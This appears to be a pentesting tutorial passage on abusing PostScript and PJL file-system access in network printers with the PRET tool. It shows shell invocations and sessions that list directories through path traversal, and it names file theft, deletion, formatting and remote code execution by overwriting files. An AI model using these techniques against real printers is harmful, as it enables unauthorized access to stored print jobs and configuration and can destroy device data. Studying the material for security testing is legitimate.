Retrieve sensitive information like configuration files or stored print jobs, RCE by writting files (like editing rc scripts or replacing binary files). Legitimate language constructs are defined for PostScript and PJL to access the filesystem.
Access the file system with PostScript (note that it could be sandboxed limiting to harmless actions):
You can use PRET commands: ls, get, put, append, delete, rename, find, mirror, touch, mkdir, cd, pwd, chvol, traversal, format, fuzz and df :
./pret.py -q printer ps
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls ../..
d - Jan 1 1970 (created Jan 1 1970) bootdev
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss
d - Jan 1 1970 (created Jan 1 1970) dsk_ram0
d - Jan 1 1970 (created Jan 1 1970) etc
d - Jan 1 1970 (created Jan 1 1970) tmp
d - Jan 1 1970 (created Jan 1 1970) webServer
Anyway accessing files with PJL is not supported by many printers.
You can use PRET commands: ls, get, put, append, delete, find, mirror, touch, mkdir, cd, pwd, chvol, traversal, format, fuzz and df :
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> ls ..
d - bootdev
d - dsk_jdi
d - dsk_jdi_ss
d - dsk_ram0
d - etc
d - lrt
d - tmp
d - webServer
d - xps